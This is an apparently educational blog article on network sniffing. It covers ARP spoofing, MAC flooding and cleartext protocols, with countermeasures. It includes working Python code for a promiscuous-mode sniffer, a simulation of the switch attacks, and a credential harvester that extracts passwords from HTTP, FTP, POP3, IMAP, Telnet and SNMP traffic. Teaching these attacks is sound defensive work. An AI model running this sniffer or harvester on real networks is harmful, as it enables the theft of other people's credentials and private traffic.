A sniffer is a program or device that monitors data traveling over a network. Sniffers can be used for legitimate activities, such as network management and troubleshooting, or for illegitimate activities, like stealing information found on a network. A variety of different types of sniffers are available, including commercial and open-source variations.
Some of the simplest types use a command-line interface to dump captured data onto the screen, while more sophisticated types use a graphical user interface (GUI), can graph traffic statistics, track multiple sessions, and offer different configuration options. Network utilization and monitoring programs often use sniffers to gather data for metrics and analysis. Generally, sniffers do not intercept or alter captured data.
Attackers typically use sniffing to capture the following:
- Passwords (from e-mail, the Web, SMB, FTP, SQL, or Telnet)
- E-mail text
- Files in transfer (e-mail files, FTP files, or SMB)
How Does a Sniffer Work?
The most common way of networking computers is through Ethernet. A computer connected to the LAN has two addresses. One is the Media Access Control (MAC) address, which uniquely identifies each node in a local area network (LAN); it is burned into the network card, although the operating system can override it. The MAC address is used by the Ethernet protocol when building the frames that carry data to and from a system. The other is the Internet Protocol (IP) address, a numerical address used to transfer data through routers and across multiple networks or wide area networks (WANs) using the Internet Protocol. At the data link layer, a frame carries the MAC address of the next hop on the local segment, not the IP address of the final destination, so the sending host must map the IP address it wants to reach to a MAC address. Address Resolution Protocol (ARP) is the Internet protocol used to do this mapping. The host first looks for the destination IP address in a table, usually called the ARP cache (if the destination is on another network, it resolves the address of its default gateway instead). If no entry is found, it broadcasts an ARP request to all machines on the local subnet. The machine with that IP address responds to the source machine with its MAC address, which is added to the source machine's ARP cache and used in all subsequent communication with that destination. ARP carries no authentication: a host has no way to verify that a reply came from the machine that really owns the address, which is exactly what the spoofing attack described later exploits.
There are two basic types of Ethernet environments, and sniffers work slightly differently in both these environments. The following are the two types of Ethernet environments:
Shared Ethernet: In a shared Ethernet environment, all hosts are connected to the same bus (typically through a hub) and compete for bandwidth. In this environment, every frame reaches every host. Thus, when machine 1 wants to talk to machine 2, it sends a frame out on the network with the destination MAC address of machine 2 along with its own source MAC address. The other machines on the shared segment (machine 3 and machine 4) compare the frame's destination MAC address with their own; if they do not match, the NIC discards the frame. A machine running a sniffer puts its NIC into promiscuous mode, which disables this check and accepts every frame. Sniffing in a shared Ethernet environment is entirely passive (nothing is transmitted) and hence difficult to detect.
Switched Ethernet: An Ethernet environment in which the hosts are connected to a switch instead of a hub is called switched Ethernet. A hub is a network device that repeats received frames to all computers connected to it. A switch maintains a table (often called the CAM or MAC address table) that maps each computer's MAC address to the physical port on which that MAC address was seen, and delivers a frame only to the port of its destination. It does not repeat the frame to all the computers on the network, which results in better utilization of the available bandwidth and, as a side effect, improved confidentiality. Hence, simply putting the NIC into promiscuous mode no longer yields everyone's traffic: the sniffing host sees only frames addressed to it, broadcasts and multicasts, and frames to destinations the switch has not yet learned. As a result, many people think that switched networks are totally secure and immune to sniffing. However, this is not true.
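As an added example (not code from the original article), here is a minimal Linux sniffer in Python that does the two things described above: it asks the kernel to put an interface into promiscuous mode through an AF_PACKET raw socket, and it decodes the Ethernet header, ARP packets and IPv4 headers of whatever arrives. The decoders are pure functions and can be exercised on constructed frames without a network. Running it on Linux as root (CAP_NET_RAW) with the interface name on the command line, `eth0` by default, is an assumption about the environment.

```python
"""Minimal promiscuous-mode sniffer with Ethernet / ARP / IPv4 decoding.

Added example for this article, not code from the original page.
Assumptions: Linux, Python 3, root (CAP_NET_RAW) to open the raw socket,
interface name given on the command line (default eth0).
"""
import socket
import struct
import sys

ETH_P_ALL = 0x0003          # capture every EtherType
ETH_P_ARP = 0x0806
ETH_P_IP = 0x0800
SOL_PACKET = 263            # from <linux/socket.h>
PACKET_ADD_MEMBERSHIP = 1   # from <linux/if_packet.h>
PACKET_MR_PROMISC = 1


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_ethernet(frame: bytes) -> dict:
    """Split a frame into destination MAC, source MAC, EtherType and payload."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    return {"dst": mac_str(dst), "src": mac_str(src),
            "type": ethertype, "payload": frame[14:]}


def parse_arp(payload: bytes) -> dict:
    """Decode an Ethernet/IPv4 ARP packet (RFC 826 layout, 28 bytes)."""
    if len(payload) < 28:
        raise ValueError("truncated ARP packet")
    (_htype, _ptype, _hlen, _plen, op,
     sha, spa, tha, tpa) = struct.unpack("!HHBBH6s4s6s4s", payload[:28])
    return {"op": {1: "request", 2: "reply"}.get(op, op),
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def parse_ipv4(payload: bytes) -> dict:
    """Decode the IPv4 header; add TCP/UDP ports when the payload has them."""
    if len(payload) < 20:
        raise ValueError("truncated IPv4 header")
    ihl = (payload[0] & 0x0F) * 4        # header length in bytes
    proto = payload[9]
    info = {"src": socket.inet_ntoa(payload[12:16]),
            "dst": socket.inet_ntoa(payload[16:20]),
            "proto": proto, "data": payload[ihl:]}
    if proto in (6, 17) and len(payload) >= ihl + 4:   # TCP or UDP
        info["sport"], info["dport"] = struct.unpack("!HH", payload[ihl:ihl + 4])
    return info


def open_promiscuous(ifname: str) -> socket.socket:
    """Bind a raw socket to ifname and ask the kernel for promiscuous mode.
    This is the 'accept every frame' step the article describes."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
    s.bind((ifname, 0))
    # struct packet_mreq { int mr_ifindex; u16 mr_type; u16 mr_alen; u8 mr_address[8]; }
    mreq = struct.pack("iHH8s", socket.if_nametoindex(ifname),
                       PACKET_MR_PROMISC, 0, b"\x00" * 8)
    s.setsockopt(SOL_PACKET, PACKET_ADD_MEMBERSHIP, mreq)
    return s


def main(ifname: str) -> None:
    s = open_promiscuous(ifname)
    while True:
        eth = parse_ethernet(s.recv(65535))
        if eth["type"] == ETH_P_ARP:
            print("ARP", parse_arp(eth["payload"]))
        elif eth["type"] == ETH_P_IP:
            ip = parse_ipv4(eth["payload"])
            print(f"IP {ip['src']}:{ip.get('sport', '-')} -> "
                  f"{ip['dst']}:{ip.get('dport', '-')} proto={ip['proto']}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "eth0")
```

On a hub, or on a switch that has been flooded or poisoned as described below, this loop prints every conversation on the segment; on a healthy switched port it prints only the host's own traffic plus ARP broadcasts, which is a quick way to see the difference for yourself.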
Though a switch is more secure than a hub, sniffing the network is possible using the following methods:
ARP spoofing: ARP is stateless. A machine can send an ARP reply even if no one asked for one, and the recipient will accept it and update its cache. When an attacker wants to sniff the traffic originating from another system, it sends the target forged replies claiming that the gateway's IP address belongs to the attacker's MAC address. The ARP cache of the target machine then holds the wrong entry for the gateway, so all the traffic the target sends toward the gateway is addressed to the attacker's MAC, and the switch delivers it, quite correctly, to the attacker's port. The attacker must then forward those frames on to the real gateway (for example by enabling IP forwarding), otherwise the target loses connectivity and the attack is noticed at once; to capture the return direction as well, the attacker poisons the gateway's cache with the same trick for the target's IP address. arpspoof from the Dsniff suite automates this; static ARP entries and ARP monitoring (arpwatch) are the usual countermeasures.
MAC flooding: Switches keep a translation table that maps MAC addresses to the physical ports on the switch and use it to forward each frame only to the port where its destination lives. But switches have limited memory for this table. MAC flooding makes use of this limitation by bombarding the switch with frames carrying random source MAC addresses until the table is full and the switch cannot learn any more addresses. Once that happens, frames for addresses that are not (or no longer) in the table are flooded to every port, so the switch behaves like a hub, a state often called "fail-open mode", and sniffing can be performed easily. MAC flooding can be performed by using Macof, a utility that comes with the Dsniff suite. Port-security features that cap the number of MAC addresses learned per port are the usual countermeasure.
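To make both mechanisms concrete, here is an added simulation (not code from the original article or from the Dsniff suite) of a switch's MAC table and a host's ARP cache. It shows an unsolicited ARP reply redirecting the victim's gateway traffic to the attacker's port, an arpwatch-style check that flags the MAC change, and a macof-style flood filling the table so that the victim's frames are flooded to every port. The table size, the "stop learning when full" behaviour, the port layout and the host addresses are assumptions of the model, not properties of any particular switch.

```python
"""Simulation of ARP spoofing and MAC flooding against a switched LAN.

Added example for this article, not code from the original page or from
the Dsniff suite. Assumptions of the model: the switch has a fixed-size
MAC table, stops learning when it is full, and floods frames whose
destination is not in the table; hosts cache any ARP reply they see.
Real switches vary in table size and ageing behaviour.
"""
import random


def random_mac() -> str:
    return ":".join(f"{random.randrange(256):02x}" for _ in range(6))


class Switch:
    """Learns source MAC -> port and forwards on that table."""

    def __init__(self, ports: int, table_size: int) -> None:
        self.ports = list(range(ports))
        self.table_size = table_size
        self.cam = {}  # MAC address -> port number

    def age_out(self) -> None:
        """Model the ageing timer expiring: every learned entry is forgotten."""
        self.cam.clear()

    def forward(self, src_mac: str, dst_mac: str, in_port: int) -> list:
        """Deliver one frame; return the list of ports it is sent out of."""
        if src_mac in self.cam or len(self.cam) < self.table_size:
            self.cam[src_mac] = in_port  # learn or refresh; a full table learns nothing new
        if dst_mac in self.cam:
            return [self.cam[dst_mac]]  # known destination: one port only
        return [p for p in self.ports if p != in_port]  # unknown: flood like a hub


class Host:
    def __init__(self, ip: str, mac: str) -> None:
        self.ip, self.mac = ip, mac
        self.arp_cache = {}  # IP address -> MAC address

    def on_arp_reply(self, sender_ip: str, sender_mac: str) -> None:
        # ARP is stateless: the reply is cached whether or not it was requested
        self.arp_cache[sender_ip] = sender_mac

    def next_hop_mac(self, ip: str) -> str:
        return self.arp_cache[ip]


class ArpWatcher:
    """arpwatch-style check: report when a known IP starts using a new MAC."""

    def __init__(self) -> None:
        self.seen = {}

    def observe(self, ip: str, mac: str) -> bool:
        changed = ip in self.seen and self.seen[ip] != mac
        self.seen[ip] = mac
        return changed


BROADCAST = "ff:ff:ff:ff:ff:ff"


def arp_spoof_demo() -> dict:
    sw = Switch(ports=4, table_size=1024)
    victim = Host("10.0.0.10", "aa:aa:aa:aa:aa:aa")    # on port 0
    gateway = Host("10.0.0.1", "cc:cc:cc:cc:cc:cc")    # on port 1
    attacker = Host("10.0.0.66", "ee:ee:ee:ee:ee:ee")  # on port 2
    for port, host in enumerate((victim, gateway, attacker)):
        sw.forward(host.mac, BROADCAST, port)           # switch learns each port
    watcher = ArpWatcher()
    victim.on_arp_reply(gateway.ip, gateway.mac)        # genuine reply to a request
    watcher.observe(gateway.ip, gateway.mac)
    before = sw.forward(victim.mac, victim.next_hop_mac(gateway.ip), 0)
    victim.on_arp_reply(gateway.ip, attacker.mac)       # unsolicited spoofed reply
    alert = watcher.observe(gateway.ip, attacker.mac)
    after = sw.forward(victim.mac, victim.next_hop_mac(gateway.ip), 0)
    return {"before": before, "after": after, "alert": alert}


def mac_flood_demo(table_size: int = 64) -> dict:
    sw = Switch(ports=4, table_size=table_size)
    victim, server, attacker_port = "aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb", 2
    sw.forward(victim, BROADCAST, 0)
    sw.forward(server, BROADCAST, 1)
    normal = sw.forward(victim, server, 0)              # unicast, attacker sees nothing
    sw.age_out()                                        # entries expire ...
    for _ in range(table_size * 2):                     # ... and a macof-style flood
        sw.forward(random_mac(), random_mac(), attacker_port)   # fills the table first
    flooded = sw.forward(victim, server, 0)             # server unknown: sent everywhere
    return {"normal": normal, "flooded": flooded, "attacker_sees": attacker_port in flooded}


if __name__ == "__main__":
    print(arp_spoof_demo())
    print(mac_flood_demo())
```

Two things the model leaves out on purpose: the spoofing attacker has to forward the captured frames on to the real gateway or the victim drops off the network, and the flooder has to keep flooding, because as soon as the bogus entries age out the legitimate hosts are relearned and unicast forwarding resumes.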
Types of Sniffing
In passive sniffing, as a sniffer gathers packets at the data link layer, it can potentially grab all the packets on the LAN of the machine running the sniffer program. This is because a network with a hub implements a broadcast medium shared by all systems on the LAN. Any data sent across the LAN is actually sent to each and every machine connected to the LAN. If an attacker runs a sniffer on one system on the LAN, he or she can gather data sent to and from any other system on the LAN. The majority of sniffer tools are ideally suited to sniff data in a hub environment. These tools are called passive sniffers because they passively wait for the data to be sent before capturing it. These sniffers are efficient at silently gathering data from the LAN.
In passive sniffing, the intruder gets access to the network by any of the following methods:
- By compromising physical security
- By using a Trojan horse
Trojan software can be used as a carrier to install sniffers on the target machine. For instance, the Back Orifice server has a plug-in known as Butt Trumpet that will e-mail the attacker after installation of the server. Once the attacker recognizes that the victim’s system has been compromised, he or she can then install a packet sniffer and use it to sniff the network.
A countermeasure against passive sniffing is to replace the network hub with a switch. Unlike a hub-based network, switched Ethernet does not repeat all frames (other than actual broadcast or multicast frames) to all systems on the LAN. The switch regulates the flow of data between its ports by learning the MAC address seen on each port, which lets it pass each frame only to its intended target.
The switch thereby limits the data that a passive sniffer can gather. A passive sniffer on a switched LAN will only see traffic going to and from the machine on which the sniffer is installed, together with broadcast and multicast traffic and the occasional frame for a destination the switch has not yet learned.
Switched networks were developed to meet the need for more bandwidth, not the need for secure networks. Since that evolution was not driven by security needs, there are ways to circumvent this network posture and sniff traffic.
So, how does an attacker sniff on a switched LAN? The sniffers for a switched LAN actively inject traffic into the LAN to enable sniffing of the traffic. This is what is known as active sniffing. Some of the methods used in this attack include the following:
- ARP spoofing
- MAC flooding
- MAC duplicating
Protocols Vulnerable to Sniffing
The following protocols carry credentials and data in clear text and are therefore vulnerable to sniffing. In each case the countermeasure is the encrypted replacement: SSH instead of Telnet and rlogin, HTTPS instead of HTTP, SNMPv3 with authentication and privacy instead of SNMPv1, and the TLS-protected variants of NNTP, POP, FTP and IMAP.
Telnet and rlogin: With sniffing, the keystrokes of a user can be captured as they are typed, including the user’s username and password. Some tools can capture all text and dump it into a terminal emulator, which can reconstruct exactly what the end user is seeing. This can produce a real-time view on the remote user’s screen.
HTTP: Plain HTTP offers no confidentiality at all. Basic authentication, used by many Web sites, sends the username and password in every request as a base64-encoded header; base64 is an encoding, not encryption, and is decoded trivially. Many other sites prompt the user for a username and password in a form and then post them across the network in plain text. Everything else in the exchange, cookies and session tokens included, is in clear text too.
SNMP: SNMPv1 (and SNMPv2c) has little security. The community string, which acts as the password, is sent in clear text in every packet, and the default values "public" and "private" are widely known.
NNTP: Passwords and data are sent in clear text across the network.
POP: Passwords and data are sent in clear text across the network.
FTP: Passwords and data are sent in clear text across the network.
IMAP: Passwords and data are sent in clear text across the network.
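As an added example (not the article's or the Dsniff project's code), here is a small credential harvester that applies the points above to reassembled session payloads, in the spirit of dsniff. Each function takes the client-to-server bytes of one session and returns what a sniffer would log: the decoded Basic header, a posted login form, USER/PASS lines (shared by FTP and POP3), an IMAP LOGIN, Telnet keystrokes reassembled from one-character segments, and the community string pulled out of an SNMPv1 packet by walking its BER encoding. The payloads in SAMPLES are constructed for this example, not captured traffic.

```python
"""Credential extraction from cleartext protocol payloads.

Added example for this article, not the page's or the dsniff project's code.
Every function takes the client-to-server bytes of one session (already
reassembled from the captured packets) and returns the credential it finds.
The SAMPLES dict holds constructed payloads, not real captures.
"""
import base64
import re
from typing import Optional, Tuple
from urllib.parse import parse_qs

Cred = Optional[Tuple[str, str]]


def http_basic(payload: bytes) -> Cred:
    """HTTP Basic auth: base64 is an encoding, not encryption."""
    m = re.search(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", payload, re.I)
    if not m:
        return None
    user, _, password = base64.b64decode(m.group(1)).decode("latin-1").partition(":")
    return user, password


def http_form(payload: bytes) -> Cred:
    """Form login over plain HTTP: the fields are merely URL-encoded in the body."""
    _, _, body = payload.partition(b"\r\n\r\n")
    fields = {k.lower(): v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
    user = next((fields[k] for k in ("username", "user", "login", "email") if k in fields), None)
    password = next((fields[k] for k in ("password", "pass", "passwd") if k in fields), None)
    return (user, password) if user and password else None


def user_pass(stream: bytes) -> Cred:
    """FTP and POP3 both log in with a 'USER x' line followed by 'PASS y'."""
    u = re.search(rb"^USER\s+(\S+)", stream, re.M | re.I)
    p = re.search(rb"^PASS\s+(\S+)", stream, re.M | re.I)
    return (u.group(1).decode("latin-1"), p.group(1).decode("latin-1")) if u and p else None


def imap_login(stream: bytes) -> Cred:
    """IMAP: '<tag> LOGIN user pass'; either argument may be a quoted string."""
    m = re.search(rb'^\S+\s+LOGIN\s+("[^"]*"|\S+)\s+("[^"]*"|\S+)', stream, re.M | re.I)
    if not m:
        return None
    user, password = (g.decode("latin-1").strip('"') for g in m.groups())
    return user, password


def telnet_login(client_segments) -> Cred:
    """Telnet sends one keystroke per segment: strip IAC option negotiation,
    join the rest, and the first two lines typed are the login and password."""
    raw = b"".join(client_segments)
    keys = re.sub(rb"\xff\xfa.*?\xff\xf0|\xff[\xfb-\xfe].|\xff.", b"", raw, flags=re.S)
    lines = keys.decode("latin-1").replace("\r\n", "\n").replace("\r\x00", "\n").split("\n")
    return (lines[0], lines[1]) if len(lines) >= 2 else None


def snmp_community(packet: bytes) -> Cred:
    """SNMPv1/v2c message = SEQUENCE { INTEGER version, OCTET STRING community, PDU }.
    Minimal BER walk (short- and long-form lengths) down to the community string."""
    def tlv(buf, off):
        tag, length, off = buf[off], buf[off + 1], off + 2
        if length & 0x80:                       # long form: next n bytes hold the length
            n = length & 0x7F
            length, off = int.from_bytes(buf[off:off + n], "big"), off + n
        return tag, buf[off:off + length], off + length

    tag, body, _ = tlv(packet, 0)
    if tag != 0x30:
        return None
    vtag, version, off = tlv(body, 0)
    ctag, community, _ = tlv(body, off)
    if vtag != 0x02 or ctag != 0x04:
        return None
    name = {0: "v1", 1: "v2c"}.get(int.from_bytes(version, "big"), "unknown")
    return name, community.decode("latin-1")


SAMPLES = {  # constructed for this example, not captured traffic
    "http_basic": b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
                  + base64.b64encode(b"alice:Winter2014") + b"\r\n\r\n",
    "http_form": b"POST /login HTTP/1.1\r\nHost: intranet\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                 b"username=bob&password=s3cret%21",
    "ftp": b"USER carol\r\nPASS hunter2\r\nPWD\r\n",
    "pop3": b"USER dave@example.org\r\nPASS letmein\r\nSTAT\r\n",
    "imap": b'a001 LOGIN erin "p@ss word"\r\n',
    "telnet": [b"\xff\xfd\x18", b"f", b"r", b"a", b"n", b"k", b"\r\n",
               b"t", b"o", b"p", b"s", b"e", b"c", b"r", b"e", b"t", b"\r\n"],
    # hand-built SNMPv1 GetRequest for sysDescr.0 with community "public"
    "snmp": bytes.fromhex(
        "3029" "020100" "04067075626c6963"            # SEQUENCE, version 0, "public"
        "a01c" "020401020304" "020100" "020100"       # GetRequest, request-id, status, index
        "300e" "300c" "06082b06010201010100" "0500"   # varbind list: sysDescr.0 = NULL
    ),
}


def harvest(samples: dict = SAMPLES) -> dict:
    """Run every extractor over its sample; this is what the sniffer would log."""
    return {
        "http_basic": http_basic(samples["http_basic"]),
        "http_form": http_form(samples["http_form"]),
        "ftp": user_pass(samples["ftp"]),
        "pop3": user_pass(samples["pop3"]),
        "imap": imap_login(samples["imap"]),
        "telnet": telnet_login(samples["telnet"]),
        "snmp": snmp_community(samples["snmp"]),
    }


if __name__ == "__main__":
    for proto, cred in harvest().items():
        print(f"{proto:10s} {cred}")
```

None of these extractors needs anything cleverer than a regular expression or a few bytes of BER parsing, which is the real lesson of the list above: once the traffic is on the wire in clear text, recovering the credential is the easy part.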
Published on Mon 03 February 2014 by Randy Nugent in Security with tag(s): network sniffer